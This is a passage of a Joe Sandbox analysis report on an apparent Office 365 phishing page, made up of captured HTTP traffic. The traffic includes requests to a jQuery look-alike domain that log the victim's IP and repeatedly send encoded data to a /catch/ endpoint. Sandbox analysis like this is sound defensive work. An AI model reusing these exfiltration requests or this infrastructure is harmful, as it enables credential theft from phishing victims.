2025-01-19 23:19:37 UTC	257	IN	HTTP/1.1 200 OK Date: Sun, 19 Jan 2025 23:19:37 GMT Server: Apache Access-Control-Allow-Headers: Authorization, Content-Type Access-Control-Allow-Origin: * Connection: close Transfer-Encoding: chunked Content-Type: application/json; charset=utf-8
2025-01-19 23:19:37 UTC	43	IN	Data Raw: 32 35 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 3a 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 7d 0d 0a Data Ascii: 25{"ip":"8.46.123.189 : United States"}
2025-01-19 23:19:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:38 UTC	348	OUT	GET /ip.php HTTP/1.1 Host: code.jquery.com.de Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:39 UTC	249	IN	HTTP/1.1 200 OK Date: Sun, 19 Jan 2025 23:19:39 GMT Server: Apache Access-Control-Allow-Headers: Authorization, Content-Type Access-Control-Allow-Origin: * Content-Length: 37 Connection: close Content-Type: application/json; charset=utf-8
2025-01-19 23:19:39 UTC	37	IN	Data Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 20 3a 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 7d Data Ascii: {"ip":"8.46.123.189 : United States"}

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:40 UTC	733	OUT	GET /post/index.php?title=Office%20365%20-%20Login&link=https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.php&time=2025-1-19%2018:19:38&ip=8.46.123.189%20:%20United%20States HTTP/1.1 Host: code.jquery.com.de Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: / sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://grtt.vantechdns.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://grtt.vantechdns.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:40 UTC	248	IN	HTTP/1.1 200 OK Date: Sun, 19 Jan 2025 23:19:40 GMT Server: Apache Access-Control-Allow-Headers: Authorization, Content-Type Access-Control-Allow-Origin: * Content-Length: 0 Connection: close Content-Type: application/json; charset=utf-8

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:41 UTC	521	OUT	GET /post/index.php?title=Office%20365%20-%20Login&link=https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data/out.php&time=2025-1-19%2018:19:38&ip=8.46.123.189%20:%20United%20States HTTP/1.1 Host: code.jquery.com.de Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:42 UTC	257	IN	HTTP/1.1 200 OK Date: Sun, 19 Jan 2025 23:19:42 GMT Server: Apache Access-Control-Allow-Headers: Authorization, Content-Type Access-Control-Allow-Origin: * Connection: close Transfer-Encoding: chunked Content-Type: application/json; charset=utf-8
2025-01-19 23:19:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:45 UTC	1046	OUT	GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1 Host: code.jquery.com.de Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: / sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://grtt.vantechdns.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://grtt.vantechdns.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:45 UTC	248	IN	HTTP/1.1 200 OK Date: Sun, 19 Jan 2025 23:19:45 GMT Server: Apache Access-Control-Allow-Headers: Authorization, Content-Type Access-Control-Allow-Origin: * Content-Length: 0 Connection: close Content-Type: application/json; charset=utf-8

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:46 UTC	834	OUT	GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1 Host: code.jquery.com.de Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:47 UTC	248	IN	HTTP/1.1 200 OK Date: Sun, 19 Jan 2025 23:19:46 GMT Server: Apache Access-Control-Allow-Headers: Authorization, Content-Type Access-Control-Allow-Origin: * Content-Length: 0 Connection: close Content-Type: application/json; charset=utf-8

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 58

Chrome Cache Entry: 59

Chrome Cache Entry: 60

Chrome Cache Entry: 61

Chrome Cache Entry: 62

Chrome Cache Entry: 63

Chrome Cache Entry: 64

Chrome Cache Entry: 65

Chrome Cache Entry: 66

Chrome Cache Entry: 67

Chrome Cache Entry: 68

Chrome Cache Entry: 69

Chrome Cache Entry: 70

Chrome Cache Entry: 71

Chrome Cache Entry: 72

Chrome Cache Entry: 73

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Chrome Cache Entry: 76

Chrome Cache Entry: 77

Chrome Cache Entry: 78

Chrome Cache Entry: 79

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

Windows Analysis Report
https://grtt.vantechdns.com/bnnnnnnnnii99/new_87392/data

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:48 UTC	834	OUT	GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1 Host: code.jquery.com.de Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:48 UTC	257	IN	HTTP/1.1 200 OK Date: Sun, 19 Jan 2025 23:19:48 GMT Server: Apache Access-Control-Allow-Headers: Authorization, Content-Type Access-Control-Allow-Origin: * Connection: close Transfer-Encoding: chunked Content-Type: application/json; charset=utf-8
2025-01-19 23:19:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:49 UTC	1046	OUT	GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1 Host: code.jquery.com.de Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: / sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://grtt.vantechdns.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://grtt.vantechdns.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:50 UTC	257	IN	HTTP/1.1 200 OK Date: Sun, 19 Jan 2025 23:19:49 GMT Server: Apache Access-Control-Allow-Headers: Authorization, Content-Type Access-Control-Allow-Origin: * Connection: close Transfer-Encoding: chunked Content-Type: application/json; charset=utf-8
2025-01-19 23:19:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:51 UTC	1046	OUT	GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1 Host: code.jquery.com.de Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: / sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://grtt.vantechdns.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://grtt.vantechdns.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:51 UTC	257	IN	HTTP/1.1 200 OK Date: Sun, 19 Jan 2025 23:19:51 GMT Server: Apache Access-Control-Allow-Headers: Authorization, Content-Type Access-Control-Allow-Origin: * Connection: close Transfer-Encoding: chunked Content-Type: application/json; charset=utf-8
2025-01-19 23:19:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:52 UTC	1046	OUT	GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1 Host: code.jquery.com.de Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: / sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://grtt.vantechdns.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://grtt.vantechdns.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:53 UTC	248	IN	HTTP/1.1 200 OK Date: Sun, 19 Jan 2025 23:19:52 GMT Server: Apache Access-Control-Allow-Headers: Authorization, Content-Type Access-Control-Allow-Origin: * Content-Length: 0 Connection: close Content-Type: application/json; charset=utf-8

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:54 UTC	1046	OUT	GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1 Host: code.jquery.com.de Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: / sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://grtt.vantechdns.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://grtt.vantechdns.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:54 UTC	248	IN	HTTP/1.1 200 OK Date: Sun, 19 Jan 2025 23:19:54 GMT Server: Apache Access-Control-Allow-Headers: Authorization, Content-Type Access-Control-Allow-Origin: * Content-Length: 0 Connection: close Content-Type: application/json; charset=utf-8

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:19:55 UTC	834	OUT	GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1 Host: code.jquery.com.de Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:19:56 UTC	248	IN	HTTP/1.1 200 OK Date: Sun, 19 Jan 2025 23:19:56 GMT Server: Apache Access-Control-Allow-Headers: Authorization, Content-Type Access-Control-Allow-Origin: * Content-Length: 0 Connection: close Content-Type: application/json; charset=utf-8

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:20:06 UTC	1046	OUT	GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1 Host: code.jquery.com.de Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: / sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://grtt.vantechdns.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://grtt.vantechdns.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:20:07 UTC	257	IN	HTTP/1.1 200 OK Date: Sun, 19 Jan 2025 23:20:06 GMT Server: Apache Access-Control-Allow-Headers: Authorization, Content-Type Access-Control-Allow-Origin: * Connection: close Transfer-Encoding: chunked Content-Type: application/json; charset=utf-8
2025-01-19 23:20:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:20:08 UTC	1046	OUT	GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1 Host: code.jquery.com.de Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: / sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://grtt.vantechdns.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://grtt.vantechdns.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:20:08 UTC	257	IN	HTTP/1.1 200 OK Date: Sun, 19 Jan 2025 23:20:08 GMT Server: Apache Access-Control-Allow-Headers: Authorization, Content-Type Access-Control-Allow-Origin: * Connection: close Transfer-Encoding: chunked Content-Type: application/json; charset=utf-8
2025-01-19 23:20:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:20:09 UTC	1046	OUT	GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1 Host: code.jquery.com.de Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: / sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://grtt.vantechdns.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://grtt.vantechdns.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:20:09 UTC	257	IN	HTTP/1.1 200 OK Date: Sun, 19 Jan 2025 23:20:09 GMT Server: Apache Access-Control-Allow-Headers: Authorization, Content-Type Access-Control-Allow-Origin: * Connection: close Transfer-Encoding: chunked Content-Type: application/json; charset=utf-8
2025-01-19 23:20:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-19 23:20:10 UTC	1046	OUT	GET /catch/index.php?dt=1312,5084,1312,2296,1886,2132,2214,1886,2009,2050,2091,1886,2009,2296,2337,1312,2378,1312,3485,4510,4305,4756,4141,4100,1312,3403,4756,3977,4756,4141,4715,1312,2501,2501,2542,1312,1640,1312,3239,4182,4182,4305,4059,4141,1312,2091,2214,2173,1312,1845,1312,3116,4551,4223,4305,4510,1312,1681,1312,2378,1804,3526,4182,3280,2296,1353,4592,4428,3854,5043,2788,2091,2952,2993,3403,1804,3403,4305,4223,4510,1312,4305,4510,1312,1558,1312,2788,4551,4879,4510,4428,4551,3977,4100,410 HTTP/1.1 Host: code.jquery.com.de Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: / sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://grtt.vantechdns.com Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://grtt.vantechdns.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-19 23:20:11 UTC	248	IN	HTTP/1.1 200 OK Date: Sun, 19 Jan 2025 23:20:11 GMT Server: Apache Access-Control-Allow-Headers: Authorization, Content-Type Access-Control-Allow-Origin: * Content-Length: 0 Connection: close Content-Type: application/json; charset=utf-8